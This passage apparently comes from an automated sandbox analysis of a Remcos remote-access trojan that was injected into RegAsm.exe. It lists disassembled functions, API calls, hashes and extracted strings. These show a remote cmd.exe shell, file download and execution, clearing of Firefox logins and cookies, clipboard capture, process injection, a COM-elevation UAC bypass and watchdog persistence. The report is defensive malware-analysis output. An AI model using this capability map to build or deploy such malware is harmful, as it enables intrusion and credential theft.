                                  • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                  • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                  • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                  APIs
                                    • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                  • _free.LIBCMT ref: 00450140
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                  • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                                  • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                  • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                  • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                  • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                  • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                  • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                  • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                  • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                  APIs
                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                  • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                  • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                  • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                  • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                                  • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                  • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                  • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                                  • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                  • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                                  APIs
                                  • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                    • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                    • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                    • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                  • DeleteFileA.KERNEL32(?), ref: 00408652
                                    • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                    • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                    • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                    • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                  • Sleep.KERNEL32(000007D0), ref: 004086F8
                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                    • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                  • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                  • API String ID: 1067849700-181434739
                                  • Opcode ID: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
                                  • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                  • Opcode Fuzzy Hash: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
                                  • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                  • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                  • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                    • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                  • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                  • CloseHandle.KERNEL32 ref: 00405A23
                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                  • CloseHandle.KERNEL32 ref: 00405A45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                  • API String ID: 2994406822-18413064
                                  • Opcode ID: 2bd343f2308bd01e46d13ee3107a7b8f798e16a4f39414714add75d6e18d8c9e
                                  • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                  • Opcode Fuzzy Hash: 2bd343f2308bd01e46d13ee3107a7b8f798e16a4f39414714add75d6e18d8c9e
                                  • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 00412106
                                    • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                    • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                    • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                  • CloseHandle.KERNEL32(00000000), ref: 00412155
                                  • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                  • API String ID: 3018269243-13974260
                                  • Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                  • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                  • Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                                  • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                  • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                  • FindClose.KERNEL32(00000000), ref: 0040BD12
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 1164774033-3681987949
                                  • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                  • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                  • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                  • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                  APIs
                                  • OpenClipboard.USER32 ref: 004168C2
                                  • EmptyClipboard.USER32 ref: 004168D0
                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                  • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                  • CloseClipboard.USER32 ref: 00416955
                                  • OpenClipboard.USER32 ref: 0041695C
                                  • GetClipboardData.USER32(0000000D), ref: 0041696C
                                  • GlobalLock.KERNEL32(00000000), ref: 00416975
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                  • CloseClipboard.USER32 ref: 00416984
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                  • String ID: !D@
                                  • API String ID: 3520204547-604454484
                                  • Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                  • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                  • Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                  • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                  • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                  • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                  • FindClose.KERNEL32(00000000), ref: 0040BED0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Close$File$FirstNext
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 3527384056-432212279
                                  • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                  • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                  • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                  • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                  • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                  • API String ID: 3756808967-1743721670
                                  • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                  • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                  • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                  • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                  • API String ID: 0-1861860590
                                  • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                  • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                  • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                  • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                  APIs
                                  • _wcslen.LIBCMT ref: 00407521
                                  • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Object_wcslen
                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                  • API String ID: 240030777-3166923314
                                  • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                  • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                  • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                  • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                  • GetLastError.KERNEL32 ref: 0041A7BB
                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                  • String ID:
                                  • API String ID: 3587775597-0
                                  • Opcode ID: b5cb2cce8405c774e90894dca81b601ecff233847bd43264dc3cebac0f8f2ebe
                                  • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                  • Opcode Fuzzy Hash: b5cb2cce8405c774e90894dca81b601ecff233847bd43264dc3cebac0f8f2ebe
                                  • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                  APIs
                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                  • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                  • String ID: lJD$lJD$lJD
                                  • API String ID: 745075371-479184356
                                  • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                  • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                  • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                  • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                  • FindClose.KERNEL32(00000000), ref: 0040C47D
                                  • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 1164774033-405221262
                                  • Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                  • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                  • Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                  • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 2341273852-0
                                  • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                  • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                  • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                  • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
